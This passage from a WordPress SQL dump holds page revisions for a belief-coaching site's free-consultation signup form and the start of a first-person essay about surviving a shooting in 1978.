action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" />\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-06-25 17:42:08', '2014-06-25 22:42:08', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1103, 2, '2014-06-25 17:44:59', '2014-06-25 22:44:59', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-06-25 17:44:59', '2014-06-25 22:44:59', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2076, 2, '2015-01-02 15:26:11', '2015-01-02 20:26:11', '<h1 style="text-align: center;">A Shot In The Light</h1>\r\n<h3 style="text-align: center;">(A true story)</h3>\r\n<h2 style="text-align: center;">by Lion Goodman</h2>\r\n&nbsp;\r\n\r\nIt happened during the summer of 1978. I was traveling through the Southwest, wandered through towns and cities, selling jewelry and giftware to stores along the way. I had just spent a productive week in Las Vegas, and felt pretty good about it. I was heading toward Los Angeles.\r\n\r\nIn the middle of the Mojave Desert, I saw a motorist whose car had broken down. The car''s hood was up, and he was staring helplessly into the motor, standing in the 100+ degree heat.  I pulled over to offer him assistance. He was down on his luck, had no plans, no money, and nowhere to go. So I invited him to travel with me, since I was headed into L.A.\r\n\r\nHis name was Ray, and he looked to be in his early twenties. He was small, muscular, wiry, and slightly gaunt, as if underfed. I felt sorry for him, and in the three days we were together, I grew to trust him. I sent him on small errands while I visited stores to sell my wares. At one point, I gave him some of my clothes, and it pleased him to have something new to wear. He seemed calm, and mostly satisfied.\r\n\r\nThe third night, we camped out next to Puddingstone Reservoir, east of Claremont. I was sitting on the floor in the back of the large van, moving things around in the cupboards to make more room for my clothes, books, food, boxes of samples, and Ray’s duffel bag and travel gear.\r\n\r\nThere was a loud explosion, and I felt a sharp, searing blow to the top of my head. Had the gas stove exploded? I looked up, but it was intact. Then I looked at Ray, sitting in the driver’s seat, and I saw the black gun in his hand. His arm was resting on the back of the seat, aiming the pistol at my face. A bullet had hit me! At first, I thought he was warning me – that he was going to rob me. That suddenly seemed fine. “Take it all,” I thought. “Take it all. Just leave me outside and drive away.”\r\n\r\nAnother explosion shook me, and my ears rang with a terrible, high-pitched whine. I felt blood dripping down my face. The top of my head throbbed. He’s not warning me, I realized. He’s going to kill me. I am going to die.\r\n\r\nThere was no place to hide. I was stuck in an uncomfortable position surrounded by cabinets. There was nothing I could do. I heard myself whisper “Relax. It’s out of your control. Breathe. Stay awake.” My thoughts turned to death, and to God. “Thy will, not my will, be done.” I let my body go, and I relaxed, slumping back against the cabinet. I watched my breath flow in and out, in and out, in and out….\r\n\r\nI began preparing for my death. I asked to be forgiven by anyone I had hurt. I offered my forgiveness to everyone who had hurt me throughout my life. It was a full-color fast-reverse movie reel of my entire twenty-six years. I thought about my parents, my brothers and sisters, my lovers, my friends. I said goodbye. I said, “I love you.”\r\n\r\nAnother explosion shook the van, and my body pulsed. I was not hit. The bullet missed me by a fraction of an inch, penetrating the cupboard to my right. I relaxed back into the reverie of my life review. My luck could not hold out. If he held a revolver, there were three bullets to go. I hoped that the gun wasn’t a semi-automatic with a full clip.\r\n\r\nNothing mattered at that moment but to be at peace. My van, my money, my business, my knowledge, my personal history, my freedom—all became worthless, meaningless. In the face of dying, it was just dust in the wind.\r\n\r\nAll I had of value was my body and my life, and that was soon to be gone. My attention was focused on the spark of light I called my Self, and my consciousness began to expand outward, extending my awareness in space and time. I heard my instructions clearly: STAY AWAKE AND KEEP BREATHING.\r\n\r\nI prayed to my God, to the Great Spirit, to receive me with open arms. Love and light flowed through me, spreading out from my heart like a lighthouse beam, illuminating everything around me. The light itself grew inside me, expanding my awareness like a huge balloon until the van and its contents seemed small. A sense of peace and acceptance filled me. I knew I would soon be leaving my body. I could sense the timeline of my life, both backward through my history and forward to my death, and beyond. I saw the next bullet – a short distance into the future – leave the gun, jet toward my left temple, and exit with brains and blood on the right side of my head. I was filled with awe. To see life from this expanded perspective was like looking down into a dollhouse, seeing all the rooms at once, with every detail in sharp relief, so real and yet so unreal at the same time. I looked into the warm and welcoming golden light with calm and acceptance.\r\n\r\nThe fourth explosion shattered the silence, and my head was pushed violently to the side. The ringing in my ears was deafening. Warm blood rushed down my head and onto my arms and thighs, dripping onto the floor. But strangely, I found myself back in my body, not out of it. Still surrounded by light, love, and peace, I began looking inside my skull, trying to find the holes. Perhaps I could see light through them? I did a quick check of my feelings, abilities, thoughts, and sensations, looking for what might be missing. Surely the bullet had affected me. My head was throbbing, but I felt strangely normal.\r\n\r\nI decided to look at my assassin – to look death directly in the face. I picked up my head and turned my eyes toward him. He was shocked. Jumping up from his seat, he shouted, “Why aren’t you dead, man? You’re supposed to be dead!”\r\n\r\n“Here I am.” I said quietly.\r\n\r\n“That’s too weird! It’s just like my dream this morning! I kept shooting at him, but he wouldn’t die! But it wasn’t you in the dream, it was somebody else!”\r\n\r\nThis was very strange. Who was writing this script? I wondered. I began to speak slowly and calmly, trying to settle him down. If I could get him talking, I thought, maybe he wouldn’t shoot again. He kept yelling, “Shut up! Just shut up!” as he peered out the windows into the darkness. He nervously walked closer to me, gun in hand, examining my bloody head, trying to understand why the four bullets he had pumped into me hadn’t finished me off.\r\n\r\nI could still feel blood oozing down my face and could hear it dripping onto my shoulder. Ray said, “I don’t know why you aren’t dead, man. I shot you four times!”\r\n\r\n“Maybe I’m not supposed to die,” I said calmly.\r\n\r\n“Yeah, but I shot you!” he said, with disappointment and confusion in his voice. “I don’t know what to do.”\r\n\r\n“What do you want to do?” I asked.\r\n\r\n“I wanted to kill you, man, to take this van and drive away. Now I don’t know.” He seemed worried, uncertain. He was beginning to slow down, becoming less jumpy.\r\n\r\n“Why did you want to kill me?”\r\n\r\n“Because you had everything, and I had nothing. And I was tired of having nothing. This was my chance to have it all.” He was still pacing back and forth in the van, looking out the windows at the black night outside.\r\n\r\n”What do you want to do now?” I asked.\r\n\r\n“I don’t know, man,” he complained. “Maybe I should take you to the hospital.”\r\n\r\nMy heart leapt at this opportunity, this chance – a way out. “Okay,” I said, not wanting to make him feel out of control. I wanted it to be his idea, not mine. I knew that his anger sprang from feeling out of control, and I didn’t want to make him feel more angry.\r\n\r\n“Why were you so nice to me, man?” he asked plaintively.\r\n\r\n“Because you’re a person, Ray.”\r\n\r\n“But I wanted to kill you! I kept taking out my gun and pointing it at you, when you were asleep or not looking. But you were being so nice to me, I couldn’t do it.” He seemed forlorn, as if he 